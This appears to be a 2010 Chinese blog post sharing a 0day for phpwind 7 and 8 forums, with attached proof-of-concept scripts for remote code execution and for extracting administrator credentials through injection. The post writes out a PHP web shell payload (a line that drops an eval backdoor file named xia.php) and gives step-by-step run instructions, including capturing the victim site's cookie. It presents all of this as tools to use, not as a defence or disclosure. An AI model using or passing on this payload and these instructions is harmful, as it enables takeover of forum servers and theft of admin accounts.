Phpwind7-8远程代码执行漏洞

2010, September 6, 1:27 PM. oday收藏
Submitted by admin

phpwind较高版本论坛中存在一个严重的漏洞,成功利用该漏洞可以远程执行任意php代码,影响phpwind 7和phpwind 8

利用POC,有两个,一个是直接getshell,一个是注入得到管理员帐号密码

请下载自行修改,在getshell中,记得把phpinfo函数改成<?fputs(fopen("xia.php","w"),"<?eval(\$_POST[xia]);?>")?>

 

1,运行getshellpoc,格式

php getshell.PHP 申请的帐号 密码 网站

 

2,推荐用这个,运行爆管理员帐户密码的POC,需要先登陆目标网站,抓包,获取$cookie与$useragent,并在POC内修改。

如图

大小: 10.41 K
尺寸: 326 x 68
浏览: 59 次
点击打开新窗口浏览全图大小: 28.32 K
尺寸: 471 x 104
浏览: 37 次
点击打开新窗口浏览全图

格式

PHP phpwind.PHP 不含HTTP的网址 /路径 1

1就是要爆的用户ID

大小: 23.75 K
尺寸: 291 x 256
浏览: 44 次
点击打开新窗口浏览全图

附件: phpwind-0day.rar (3.8 K, 下载次数:343)

Tags: phpwind

« 上一篇 | 下一篇 »

只显示10条记录相关文章
Trackbacks
点击获得Trackback地址,Encode: UTF-8 点击获得Trackback地址,Encode: GB2312 or GBK 点击获得Trackback地址,Encode: BIG5
发表评论

评论内容 (必填):